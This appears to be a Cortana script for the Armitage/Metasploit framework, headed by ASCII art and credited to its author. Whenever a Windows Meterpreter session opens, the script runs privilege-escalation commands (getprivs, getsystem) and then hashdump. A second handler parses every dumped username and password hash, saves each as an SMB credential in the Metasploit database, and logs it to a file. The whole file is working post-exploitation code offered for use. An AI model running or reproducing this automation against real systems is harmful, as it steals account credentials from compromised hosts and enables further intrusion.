# Cortana script to discover strange new networks.
#                                                           _
#                                                          //
#                                                         //
#                                         _______________//__
#                                       .(______________//___).
#                                       |              /      |
#                                       |. . . . . . . / . . .|
#                                       \ . . . . . ./. . . . /
#                                        |           / ___   |
#                    _.---._             |::......./../...\.:|
#                _.-~       ~-._         |::::/::\::/:\::::::|
#            _.-~               ~-._     |::::\::/::::::X:/::|
#        _.-~                       ~---.;:::::::/::\::/:::::|
#    _.-~                                 ~\::::::n::::::::::|
# .-~                                    _.;::/::::a::::::::/
# :-._                               _.-~ ./::::::::d:::::::|
# `-._~-._                   _..__.-~ _.-~|::/::::::::::::::|
#  /  ~-._~-._              / .__..--~----.YWWWWWWWWWWWWWWWP'
# \_____(_;-._\.        _.-~_/       ~).. . \
#    /(_____  \`--...--~_.-~______..-+_______)
#  .(_________/`--...--~/    _/           /\
# /-._     \_     (___./_..-~__.....__..-~./
# `-._~-._   ~\--------~  .-~_..__.-~ _.-~
#     ~-._~-._ ~---------'  / .__..--~
#         ~-._\.        _.-~_/
#             \`--...--~_.-~
#              `--...--~
#
# by monstream00
# Step 1. When a session opens, grab its routes.
on session_sync {
	if (-iswinmeterpreter $1) {
		m_cmd($1, "getprivs");
		m_cmd($1, "getsystem");
		m_cmd($1, "getprivs");
		m_cmd($1, "hashdump");
	}
}

#global('%last');

on meterpreter_hashdump {
	#println("========================================================================================================");
	#println("On Meterpreter Hashdump Script Activated!");
	#println("========================================================================================================");
	local('$entry $user $hash $count');
	foreach $entry (split("\n", $3)) {
		if ($entry ismatch '(.*?):\d+:(.*?):(.*?):.*') {
			($user, $fhash, $lhash) = matched();
			$hash = $fhash . ":" . $lhash;
			#sleep(2 * 1000);
			credential_add(session_host($1), 445, $user, $hash, "smb_hash");
			#sleep(2 * 1000);
			$temphoststore = session_host($1);
			println("[*] Dumping $temphoststore session $1 : $user $hash into database!");
			$count += 1;
			$console = console();
			cmd($console, "echo [*] `date` Dumping $temphoststore session $1 : $user $hash into database! >> /opt/metasploit/msf3/data/armitage/cortana.log");
		}
	}
	#println("[*] Finshed saveing $count hashes on " . session_host($1));
}
